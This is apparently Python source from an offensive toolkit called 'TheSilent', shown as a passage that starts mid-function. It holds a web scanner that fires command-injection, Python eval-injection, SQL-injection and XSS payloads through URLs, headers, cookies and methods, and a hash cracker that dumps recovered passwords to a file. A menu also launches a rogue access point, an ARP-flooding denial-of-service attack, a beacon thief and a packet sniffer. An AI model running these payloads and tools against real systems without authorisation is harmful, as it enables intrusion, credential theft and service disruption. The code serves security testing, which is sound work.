            if mal == "/ping -c 60 127.0.0.1" and end - start >= 60:
                response_command_headers = True

    # test for command injection in cookie
    print(CYAN + "checking for command injection in cookie")
    mal_commands = ["/echo TheSilent", "/ping -c 60 127.0.0.1"]
    for mal in mal_commands:
        time.sleep(delay)
        start = time.time()
        try:
            my_request = urllib.request.Request(host, method="GET")
            my_request.add_header("User-Agent",return_user_agent())
            my_request.add_header("Cookie",mal)
            simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
        except:
            continue
        
        end = time.time()
        if mal == "/echo TheSilent" and "TheSilent" in simple_response and "echo" not in simple_response and "TheSilent" not in false_postive_check:
            response_command_cookie = True
            payload_list.append(f"cookie: {mal}")

        if mal == "/ping -c 60 127.0.0.1" and end - start >= 60:
            response_command_cookie = True
                
    # test for command injection in method
    print(CYAN + "checking for command injection in method")
    mal_commands = ["/echo TheSilent", "/ping -c 60 127.0.0.1"]
    for mal in mal_commands:
        time.sleep(delay)
        start = time.time()
        try:
            my_request = urllib.request.Request(host, method=mal)
            my_request.add_header("User-Agent",return_user_agent())
            simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
        except:
            continue
        
        end = time.time()
        if mal == "/echo TheSilent" and "TheSilent" in simple_response and "echo" not in simple_response and "TheSilent" not in false_postive_check:
            response_command_method = True
            payload_list.append(f"method: {mal}")

        if mal == "/ping -c 60 127.0.0.1" and end - start >= 60:
            response_command_method = True
            payload_list.append(f"method: {mal}")

    # test for python injection in url
    print(CYAN + "checking for python injection in url")
    mal_python = [r'eval(compile("import sys\ndef the_silent():\n return sys.version\nprint(the_silent())", "thesilent", "exec"))', r'eval(compile("import sys\ndef the_silent():\n return sys.version\nthe_silent()", "thesilent", "exec"))', r'eval(compile("import time\ntime.sleep(60)", "thesilent", "exec"))']
    for mal in mal_python:
        time.sleep(delay)
        start = time.time()
        try:
            my_request = urllib.request.Request(host + f"/{urllib.parse.quote(mal)}", method="GET")
            my_request.add_header("User-Agent",return_user_agent())
            simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
        except:
            continue
        
        end = time.time()
        if mal == r'eval(compile("import sys\ndef the_silent():\n return sys.version\nprint(the_silent())", "thesilent", "exec"))' and "gcc" in simple_response.lower() and "gcc" not in false_positive_check.lower():
            response_python_url = True
            payload_list.append(f"url: {mal}")

        if mal == r'eval(compile("import sys\ndef the_silent():\n return sys.version\nthe_silent()", "thesilent", "exec"))' and "gcc" in simple_response.lower() and "gcc" not in false_positive_check.lower():
            response_python_url = True
            payload_list.append(f"url: {mal}")
            
        if mal == r'eval(compile("import time\ntime.sleep(60)", "thesilent", "exec"))' and end - start >= 60:
            response_python_url = True
            payload_list.append(f"url: {mal}")
                
    # test for python injection in headers
    print(CYAN + "checking for python injection in headers")
    mal_python = [r'eval(compile("import sys\ndef the_silent():\n return sys.version\nprint(the_silent())", "thesilent", "exec"))', r'eval(compile("import sys\ndef the_silent():\n return sys.version\nthe_silent()", "thesilent", "exec"))', r'eval(compile("import time\ntime.sleep(60)", "thesilent", "exec"))']
    
    # get original headers
    try:
        my_request = urllib.request.Request(host, method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        header_response = urllib.request.urlopen(my_request, context=verify).headers
    except:
        pass
    
    time.sleep(delay)
    for head in header_response:
        for mal in mal_python:
            time.sleep(delay)
            start = time.time()
            try:
                my_request = urllib.request.Request(host, method="GET")
                my_request.add_header("User-Agent",return_user_agent())
                my_request.add_header(head,mal)
                simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
            except:
                continue
            
            end = time.time()
            if mal == r'eval(compile("import sys\ndef the_silent():\n return sys.version\nprint(the_silent())", "thesilent", "exec"))' and "gcc" in simple_response.lower() and "gcc" not in false_positive_check.lower():
                response_python_headers = True
                payload_list.append(f"header: {head}:{mal}")

            if mal == r'eval(compile("import sys\ndef the_silent():\n return sys.version\nthe_silent()", "thesilent", "exec"))' and "gcc" in simple_response.lower() and "gcc" not in false_positive_check.lower():
                response_python_headers = True
                payload_list.append(f"header: {head}:{mal}")
                
            if mal == r'eval(compile("import time\ntime.sleep(60)", "thesilent", "exec"))' and end - start >= 60:
                response_python_headers = True
                payload_list.append(f"header: {head}:{mal}")

    # test for python injection in cookie
    print(CYAN + "checking for python injection in cookie")
    mal_python = [r'eval(compile("import sys\ndef the_silent():\n return sys.version\nprint(the_silent())", "thesilent", "exec"))', r'eval(compile("import sys\ndef the_silent():\n return sys.version\nthe_silent()", "thesilent", "exec"))', r'eval(compile("import time\ntime.sleep(60)", "thesilent", "exec"))']
    for mal in mal_python:
        time.sleep(delay)
        start = time.time()
        try:
            my_request = urllib.request.Request(host, method="GET")
            my_request.add_header("User-Agent",return_user_agent())
            my_request.add_header("Cookie",mal)
            simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
        except:
            continue
        
        end = time.time()
        if mal == r'eval(compile("import sys\ndef the_silent():\n return sys.version\nprint(the_silent())", "thesilent", "exec"))' and "gcc" in simple_response.lower() and "gcc" not in false_positive_check.lower():
            response_python_cookie = True
            payload_list.append(f"cookie: {mal}")

        if mal == r'eval(compile("import sys\ndef the_silent():\n return sys.version\nthe_silent()", "thesilent", "exec"))' and "gcc" in simple_response.lower() and "gcc" not in false_positive_check.lower():
            response_python_cookie = True
            payload_list.append(f"cookie: {mal}")
            
        if mal == r'eval(compile("import time\ntime.sleep(60)", "thesilent", "exec"))' and end - start >= 60:
            response_python_cookie = True
            payload_list.append(f"cookie: {mal}")

    # test for python injection in method
    print(CYAN + "checking for python injection in method")
    mal_python = [r'eval(compile("import sys\ndef the_silent():\n return sys.version\nprint(the_silent())", "thesilent", "exec"))', r'eval(compile("import sys\ndef the_silent():\n return sys.version\nthe_silent()", "thesilent", "exec"))', r'eval(compile("import time\ntime.sleep(60)", "thesilent", "exec"))']
    for mal in mal_python:
        time.sleep(delay)
        start = time.time()
        try:
            my_request = urllib.request.Request(host, method=mal)
            my_request.add_header("User-Agent",return_user_agent())
            simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
        except:
            continue
        
        end = time.time()
        if mal == r'eval(compile("import sys\ndef the_silent():\n return sys.version\nprint(the_silent())", "thesilent", "exec"))' and "gcc" in simple_response.lower() and "gcc" not in false_positive_check.lower():
            response_python_method = True
            payload_list.append(f"method: {mal}")

        if mal == r'eval(compile("import sys\ndef the_silent():\n return sys.version\nthe_silent()", "thesilent", "exec"))' and "gcc" in simple_response.lower() and "gcc" not in false_positive_check.lower():
            response_python_method = True
            payload_list.append(f"method: {mal}")
            
        if mal == r'eval(compile("import time\ntime.sleep(60)", "thesilent", "exec"))' and end - start >= 60:
            response_python_method = True
            payload_list.append(f"method: {mal}")

    # test for sql injection in url
    print(CYAN + "checking for sql injection in url")
    mal_sql = ["'", '"', "*", ";", "`", "')", '")', "*)", ";)", "`)", "'))", '"))', "*))", ";))", "`))", "')))", '")))', "*)))", ";)))", "`)))"]
    for mal in mal_sql:
        time.sleep(delay)
        try:
            my_request = urllib.request.Request(host + f"/{urllib.parse.quote(mal)}", method="GET")
            my_request.add_header("User-Agent",return_user_agent())
            simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
        except:
            pass
        
        for error in sql_errors:
            result = re.search(error, simple_response)
            if result:
                response_sql_url = True
                payload_list.append(f"url: {mal}")
                
    # test for sql injection in headers
    print(CYAN + "checking for sql injection in headers")
    mal_sql = ["'", '"', "*", ";", "`", "')", '")', "*)", ";)", "`)", "'))", '"))', "*))", ";))", "`))", "')))", '")))', "*)))", ";)))", "`)))"]

    # get original headers
    try:
        my_request = urllib.request.Request(host, method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        header_response = urllib.request.urlopen(my_request, context=verify).headers
    except:
        pass
    
    time.sleep(delay)
    for head in header_response:
        for mal in mal_sql:
            time.sleep(delay)
            try:
                my_request = urllib.request.Request(host, method="GET")
                my_request.add_header("User-Agent",return_user_agent())
                my_request.add_header(head,mal)
                simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
            except:
                continue
            
            for error in sql_errors:
                result = re.search(error, simple_response)
                if result:
                    response_sql_headers = True
                    payload_list.append(f"header: {head}:{mal}")

    # test for sql injection in cookie
    print(CYAN + "checking for sql injection in cookie")
    mal_sql = ["'", '"', "*", ";", "`", "')", '")', "*)", ";)", "`)", "'))", '"))', "*))", ";))", "`))", "')))", '")))', "*)))", ";)))", "`)))"]
    for mal in mal_sql:
        time.sleep(delay)
        try:
            my_request = urllib.request.Request(host, method="GET")
            my_request.add_header("User-Agent",return_user_agent())
            my_request.add_header("Cookie",mal)
            simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
        except:
            continue

        for error in sql_errors:
            result = re.search(error, simple_response)
            if result:
                response_sql_cookie = True
                payload_list.append(f"cookie: {mal}")

    # test for sql injection in method
    print(CYAN + "checking for sql injection in method")
    mal_sql = ["'", '"', "*", ";", "`", "')", '")', "*)", ";)", "`)", "'))", '"))', "*))", ";))", "`))", "')))", '")))', "*)))", ";)))", "`)))"]
    for mal in mal_sql:
        time.sleep(delay)
        try:
            my_request = urllib.request.Request(host, method=mal)
            my_request.add_header("User-Agent",return_user_agent())
            simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
        except:
            continue
        
        for error in sql_errors:
            result = re.search(error, simple_response)
            if result:
                response_sql_method = True
                payload_list.append(f"method: {mal}")
                
    # test for xss in url
    print(CYAN + "checking for xss in url")
    mal_xss = ["<div>TheSilent</div>", "<em>TheSilent</em>", "<iframe>TheSilent</iframe>", "<input type='text' id='thesilent' name='TheSilent' value='TheSilent'>", "<p>TheSilent</p>", '<script>alert("TheSilent")</script>;', '<script>prompt("TheSilent")</script>;', "<strong>TheSilent</strong>"]
    for mal in mal_xss:
        time.sleep(delay)
        try:
            my_request = urllib.request.Request(host + f"/{urllib.parse.quote(mal)}", method="GET")
            my_request.add_header()
            simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
        except:
            continue

        if mal in simple_response:
            response_xss_url = True
            payload_list.append(f"url: {mal}")

    # test for xss in headers
    print(CYAN + "checking for xss in headers")
    mal_xss = ["<div>TheSilent</div>", "<em>TheSilent</em>", "<iframe>TheSilent</iframe>", "<input type='text' id='thesilent' name='TheSilent' value='TheSilent'>", "<p>TheSilent</p>", '<script>alert("TheSilent")</script>;', '<script>prompt("TheSilent")</script>;', "<strong>TheSilent</strong>"]

    # get original headers
    try:
        my_request = urllib.request.Request(host, method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        header_response = urllib.request.urlopen(my_request, context=verify).headers
    except:
        pass
    
    time.sleep(delay)
    for head in header_response:
        for mal in mal_xss:
            time.sleep(delay)
            try:
                my_request = urllib.request.Request(host, method="GET")
                my_request.add_header("User-Agent",return_user_agent())
                my_request.add_header(head,mal)
                simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
            except:
                continue
            
            if mal in simple_response:
                response_xss_headers = True
                payload_list.append(f"header: {head}:{mal}")

    # test for xss in cookie
    print(CYAN + "checking for xss in cookie")
    mal_xss = ["<div>TheSilent</div>", "<em>TheSilent</em>", "<iframe>TheSilent</iframe>", "<input type='text' id='thesilent' name='TheSilent' value='TheSilent'>", "<p>TheSilent</p>", '<script>alert("TheSilent")</script>;', '<script>prompt("TheSilent")</script>;', "<strong>TheSilent</strong>"]
    for mal in mal_xss:
        time.sleep(delay)
        try:
            my_request = urllib.request.Request(host, method="GET")
            my_request.add_header("User-Agent",return_user_agent())
            my_request.add_header("Cookie",mal)
            simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
        except:
            continue
        
        if mal in simple_response:
            response_xss_cookie = True
            payload_list.append(f"cookie: {mal}")

    # test for xss in method
    print(CYAN + "checking for xss in method")
    mal_xss = ["<div>TheSilent</div>", "<em>TheSilent</em>", "<iframe>TheSilent</iframe>", "<input type='text' id='thesilent' name='TheSilent' value='TheSilent'>", "<p>TheSilent</p>", '<script>alert("TheSilent")</script>;', '<script>prompt("TheSilent")</script>;', "<strong>TheSilent</strong>"]
    for mal in mal_xss:
        time.sleep(delay)
        try:
            my_request = urllib.request.Request(host, method=mal)
            my_request.add_header("User-Agent",return_user_agent())
            simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
        except:
            continue
        
        if mal in simple_response:
            response_xss_method = True
            payload_list.append(f"method: {mal}")

    # test for annonymous ftp bindings
    print(CYAN + "checking for annonymous ftp bindings")
    ftp_verify = False
    new_host = host.replace("http://", "")
    new_host = new_host.replace("https://", "")
    try:
        ftp = FTP(new_host)
        ftp.login()
        ftp.close()
        ftp_verify = True
    except:
        pass

    time.sleep(delay)
    try:
        ftp = FTP_TLS(new_host)
        ftp.login()
        ftp.close()
        ftp_verify = True 
    except:
        pass
    
    secure = True
    clear()

    threats = []

    if response_admin == 200:
        threats.append("Admin page found!")
        secure = False

    if response_cgi_bin == 200:
        threats.append("CGI-BIN directory found!")
        secure = False

    if response_command_url:
        threats.append("Command injection in url found!")
        secure = False

    if response_command_headers:
        threats.append("Command injection in headers found!")
        secure = False

    if response_command_cookie:
        threats.append("Command injection in cookie found!")
        secure = False

    if response_command_method:
        threats.append("Command injection in method found!")
        secure = False

    if response_directory_traversal == 200:
        threats.append("Directory traversal using /.../ found!")
        secure = False

    if response_env == 200:
        threats.append(".ENV found!")
        secure = False

    if ftp_verify:
        threats.append("Annonymous ftp binding found!")
        secure = False

    if response_git == 200:
        threats.append(".GIT found!")
        secure = False

    if response_python_url:
        threats.append("Python injection in url found!")
        secure = False

    if response_python_headers:
        threats.append("Python injection in headers found!")
        secure = False

    if response_python_cookie:
        threats.append("Python injection in cookie found!")
        secure = False

    if response_python_method:
        threats.append("Python injection in method found!")
        secure = False

    if response_sql_url:
        threats.append("SQL injection found in url!")
        secure = False

    if response_sql_headers:
        threats.append("SQL injection found in headers!")
        secure = False

    if response_sql_cookie:
        threats.append("SQL injection found in cookie!")
        secure = False

    if response_sql_method:
        threats.append("SQL injection found in method!")
        secure = False

    if response_the_silent_directory == 200:
        threats.append("TheSilent directory found (directory traversal attempts need to be manually checked)!")
        secure = False

    if response_the_silent_method == 200:
        threats.append("THESILENT method allowed (all methods are allowed)!")
        secure = False

    if response_trace == 200:
        threats.append("TRACE method allowed!")
        secure = False

    if response_track == 200:
        threats.append("TRACK method allowed!")
        secure = False

    if response_xss_url:
        threats.append("XSS found in url!")
        secure = False

    if response_xss_headers:
        threats.append("XSS found in headers!")
        secure = False

    if response_xss_cookie:
        threats.append("XSS found in cookie!")
        secure = False

    if response_xss_method:
        threats.append("XSS found in method!")
        secure = False
        
    if secure:
        print(GREEN + "")
        clear()
        return "This server is secure!"

    else:
        print(RED + "")
        clear()

        return threats, payload_list



import hashlib
import itertools
from TheSilent.clear import clear

CYAN = "\033[1;36m"

# brute force hash using dictionary method


def dictionary_hash(my_file, my_hash="", hash_list="", mask=False, minimum=1, maximum=10):
    clear()
    my_hash = my_hash.lower()
    dictionary = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ "

    blake2b = ""
    blake2s = ""
    md5 = ""
    sha1 = ""
    sha224 = ""
    sha256 = ""
    sha512 = ""
    sha3256 = ""
    sha3384 = ""
    sha3512 = ""

    crack_boolean = False
    my_hash_list = []
    password_list = []
    word_list = []

    print(CYAN + "cracking hash")

    if hash_list == "" and my_hash != "":
        with open(my_file, "r", errors="ignore") as file:
            for i in file:
                clean = i.replace("\n", "")
                word_list.append(clean)

        if not mask:
            for i in range(minimum, maximum + 1):
                if crack_boolean:
                    break

                print(CYAN + "attempting length: " + str(i))

                for ii in itertools.product(word_list, repeat=i):
                    compute = "".join(ii)

                    if len(my_hash) == 32:
                        md5 = hashlib.md5(compute.encode("utf8")).hexdigest()

                    if len(my_hash) == 40:
                        sha1 = hashlib.sha1(compute.encode("utf8")).hexdigest()

                    if len(my_hash) == 56:
                        sha224 = hashlib.sha224(
                            compute.encode("utf8")).hexdigest()

                    if len(my_hash) == 64:
                        blake2s = hashlib.blake2s(
                            compute.encode("utf8")).hexdigest()
                        sha256 = hashlib.sha256(
                            compute.encode("utf8")).hexdigest()
                        sha3256 = hashlib.sha3_256(
                            compute.encode("utf8")).hexdigest()

                    if len(my_hash) == 96:
                        sha3384 = hashlib.sha3_384(
                            compute.encode("utf8")).hexdigest()

                    if len(my_hash) == 128:
                        blake2b = hashlib.blake2b(
                            compute.encode("utf8")).hexdigest()
                        sha512 = hashlib.sha512(
                            compute.encode("utf8")).hexdigest()
                        sha3512 = hashlib.sha3_512(
                            compute.encode("utf8")).hexdigest()

                    if str(blake2b) == my_hash:
                        crack_boolean = True
                        print(CYAN + "password: " + str(compute))
                        break

                    if str(blake2s) == my_hash:
                        crack_boolean = True
                        print(CYAN + "password: " + str(compute))
                        break

                    if str(md5) == my_hash:
                        crack_boolean = True
                        print(CYAN + "password: " + str(compute))
                        break

                    if str(sha1) == my_hash:
                        crack_boolean = True
                        print(CYAN + "password: " + str(compute))
                        break

                    if str(sha224) == my_hash:
                        crack_boolean = True
                        print(CYAN + "password: " + str(compute))
                        break

                    if str(sha256) == my_hash:
                        crack_boolean = True
                        print(CYAN + "password: " + str(compute))
                        break

                    if str(sha512) == my_hash:
                        crack_boolean = True
                        print(CYAN + "password: " + str(compute))
                        break

                    if str(sha3256) == my_hash:
                        crack_boolean = True
                        print(CYAN + "password: " + str(compute))
                        break

                    if str(sha3384) == my_hash:
                        crack_boolean = True
                        print(CYAN + "password: " + str(compute))
                        break

                    if str(sha3512) == my_hash:
                        crack_boolean = True
                        print(CYAN + "password: " + str(compute))
                        break

        if mask:
            for i in range(minimum, maximum + 1):
                if crack_boolean:
                    break

                print(CYAN + "attempting length: " + str(i))

                for words in word_list:
                    if crack_boolean == True:
                        break

                    print("checking: " + words)

                    for ii in itertools.product(dictionary, repeat=i):
                        var = "".join(ii)
                        compute = words + var

                        if len(my_hash) == 32:
                            md5 = hashlib.md5(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 40:
                            sha1 = hashlib.sha1(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 56:
                            sha224 = hashlib.sha224(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 64:
                            blake2s = hashlib.blake2s(
                                compute.encode("utf8")).hexdigest()
                            sha256 = hashlib.sha256(
                                compute.encode("utf8")).hexdigest()
                            sha3256 = hashlib.sha3_256(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 96:
                            sha3384 = hashlib.sha3_384(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 128:
                            blake2b = hashlib.blake2b(
                                compute.encode("utf8")).hexdigest()
                            sha512 = hashlib.sha512(
                                compute.encode("utf8")).hexdigest()
                            sha3512 = hashlib.sha3_512(
                                compute.encode("utf8")).hexdigest()

                        if str(blake2b) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            break

                        if str(blake2s) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            break

                        if str(md5) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            break

                        if str(sha1) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            break

                        if str(sha224) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            break

                        if str(sha256) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            break

                        if str(sha512) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            break

                        if str(sha3256) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            break

                        if str(sha3384) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            break

                        if str(sha3512) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            break

    if hash_list != "" and my_hash == "":
        with open(hash_list, "r", errors="ignore") as file:
            for i in file:
                clean = i.replace("\n", "")
                my_hash_list.append(clean)

        with open(my_file, "r", errors="ignore") as file:
            for i in file:
                clean = i.replace("\n", "")
                word_list.append(clean)

        for my_hash in my_hash_list:
            my_hash = my_hash.lower()

            if mask == False:
                for i in range(minimum, maximum + 1):
                    if crack_boolean:
                        crack_boolean = False
                        break

                    print(CYAN + "attempting length: " + str(i))

                    for ii in itertools.product(word_list, repeat=i):
                        compute = "".join(ii)

                        if len(my_hash) == 32:
                            md5 = hashlib.md5(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 40:
                            sha1 = hashlib.sha1(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 56:
                            sha224 = hashlib.sha224(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 64:
                            blake2s = hashlib.blake2s(
                                compute.encode("utf8")).hexdigest()
                            sha256 = hashlib.sha256(
                                compute.encode("utf8")).hexdigest()
                            sha3256 = hashlib.sha3_256(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 96:
                            sha3384 = hashlib.sha3_384(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 128:
                            blake2b = hashlib.blake2b(
                                compute.encode("utf8")).hexdigest()
                            sha512 = hashlib.sha512(
                                compute.encode("utf8")).hexdigest()
                            sha3512 = hashlib.sha3_512(
                                compute.encode("utf8")).hexdigest()

                        if str(blake2b) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(blake2s) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(md5) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha1) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha224) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha256) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha512) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha3256) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha3384) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha3512) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

        if mask:
            for i in range(minimum, maximum + 1):
                if crack_boolean:
                    break

                print(CYAN + "attempting length: " + str(i))

                for words in word_list:
                    if crack_boolean:
                        crack_boolean = False
                        break

                    print("checking: " + words)

                    for ii in itertools.product(dictionary, repeat=i):
                        var = "".join(ii)
                        compute = words + var

                        if len(my_hash) == 32:
                            md5 = hashlib.md5(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 40:
                            sha1 = hashlib.sha1(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 56:
                            sha224 = hashlib.sha224(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 64:
                            blake2s = hashlib.blake2s(
                                compute.encode("utf8")).hexdigest()
                            sha256 = hashlib.sha256(
                                compute.encode("utf8")).hexdigest()
                            sha3256 = hashlib.sha3_256(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 96:
                            sha3384 = hashlib.sha3_384(
                                compute.encode("utf8")).hexdigest()

                        if len(my_hash) == 128:
                            blake2b = hashlib.blake2b(
                                compute.encode("utf8")).hexdigest()
                            sha512 = hashlib.sha512(
                                compute.encode("utf8")).hexdigest()
                            sha3512 = hashlib.sha3_512(
                                compute.encode("utf8")).hexdigest()

                        if str(blake2b) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(blake2s) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(md5) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha1) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha224) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha256) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha512) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha3256) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha3384) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

                        if str(sha3512) == my_hash:
                            crack_boolean = True
                            print(CYAN + "password: " + str(compute))
                            password_list.append(str(compute))
                            break

    with open("password dump.txt", "a") as f:
        for password in password_list:
            f.write(password + "\n")

    print(CYAN + "done")



from TheSilent.ap import *
from TheSilent.arp_void import *
from TheSilent.beacon_thief import *
from TheSilent.brute_force_hash import *
from TheSilent.clear import *
from TheSilent.dictionary_hash import *
from TheSilent.hex_viewer import *
from TheSilent.osint import *
from TheSilent.packet_sniffer import *
from TheSilent.secure_overwrite import *
from TheSilent.source_code_viewer import *
from TheSilent.web_scanner import *

CYAN = "\033[1;36m"

def main():
    print(CYAN + "")
    clear()

    print("1 | rogue access point | linux/root/monitor mode")
    print("2 | arp flooding dos attack | linux/root")
    print("3 | beacon thief | linux/root/monitor mode")
    print("4 | brute force hash | all")
    print("5 | dictionary force hash | all")
    print("6 | hex viewer | all")
    print("7 | osint | all")
    print("8 | packet sniffer | linux/root")
    print("9 | secure overwrite | all/root may be required")
    print("10 | source code viewer | all")
    print("11 | web scanner | all")
    print("")
    tool = input()

    if tool == "1":
        clear()
        name = input("name\n")
        interface = input("interface\n")
        ap(name, interface)

    if tool == "2":
        clear()
        router = input("ip of router\n")
        interface = input("interface\n")
        arp_void(router, interface)

    if tool == "3":
        clear()
        interface = input("interface\n")
        beacon_thief(interface)

    if tool == "4":
        clear()
        my_hash = input("hash\n")
        brute_force_hash(my_hash)

    if tool == "5":
        clear()
        my_file = input("file\n")
        my_hash = input("hash\n")
        dictionary_hash(my_file, my_hash, mask=True)

    if tool == "6":
        clear()
        file = input("file\n")
        hex_viewer(file)

    if tool == "7":
        clear()
        username = input("username\n")
        accounts = osint(username)
        for account in accounts:
            print(CYAN + account)

    if tool == "8":
        clear()
        packet_sniffer(data=True, hex_dump=True)

    if tool == "9":
        clear()
        device = input("file, folder, or device\n")
        secure_overwrite(device)

    if tool == "10":
        clear()
        file = input("file\n")
        source_code_viewer(file)

    if tool == "11":
        clear()
        host = input("host\n")
        print(web_scanner(host))

main()
